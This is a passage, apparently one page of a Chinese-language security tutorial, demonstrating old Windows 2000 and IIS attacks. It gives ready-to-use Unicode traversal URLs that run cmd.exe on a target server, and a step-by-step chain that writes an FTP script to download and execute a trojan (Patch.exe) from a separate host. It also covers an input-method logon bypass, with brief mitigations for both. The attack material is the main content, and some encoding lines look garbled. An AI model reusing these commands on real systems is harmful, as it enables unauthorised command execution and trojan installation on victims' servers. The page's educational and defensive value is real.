第六部分：网络安全实例讲解（NETBUS攻击、利用Win2000输入法漏洞攻击、UNICODE漏洞演示）

先谈谈UNICODE漏洞，这是2001年微软IIS10大漏洞之首

利用IIS编码时的漏洞，在一个可执行的目录中执行命令
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

下面的URL可能列出当前目录的内容：

http://www.目标机.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.目标机.com/ a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
http://x.x.x.x/scripts/..%c1%1c../
winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe

在英文版本中使用 %c1%af 能正常利用这个漏洞

利用这个漏洞安装木马：

1.找一个ftp服务器，将须上载的文件copy 到ftp服务器上，假设这个 ftp server的 ip:192.168.0.100 ,username:neptune,password:abcd123 文件名：Patch.exe

2.编辑一个上载执行文件 http://ip/scripts/ccc.exe?/c+echo+open+192.168.0.100>+up.txt http://ip/scripts/ccc.exe?/c+echo+neptune>>+up.txt (>>号前不要有空格）

http://ip/scripts/ccc.exe?/c+echo+abcd123>>
+up.txt http://ip/scripts/ccc.exe?/c+echo+get patch.exe>>
+up.txt http://ip/scripts/ccc.exe?/c+echo+quit>>+up.txt http://ip/scripts/ccc.exe?/c+ftp+-s:up.txt

3.在scripts目录中执行木马程序

防范方法：将操作系统或IIS默认安装目录改名，删除Scripts目录

输入法漏洞：

使用WIN2000终端方式利用输入法漏洞对WIN2000SERVER进行攻击
演示
攻击方式：Windows2000 BUGS
被攻击主机IP：192.168.0.123
被攻击主机操作系统：Winows2000 Advanced Server
发动攻击平台：Windows2000 Professional
使用工具：Windows2000 终端客户端软件

修补方式：
1、删除有BUG文件：win2000的安装目录下(如:C:WINNT)的help目录下，对应的帮助文件是：※?WINIME.CHM?输入法操作指南? ※?WINSP.CHM?双拼输入法帮助?※?WINZM.CHM?郑码输入法帮助?※?WINPY.CHM?全拼输入法帮助? ※?WINGB.CHM?内码输入法帮助?
2、打补丁（SP1）

更多内容请看下一页：|1|2|3|4|5|6|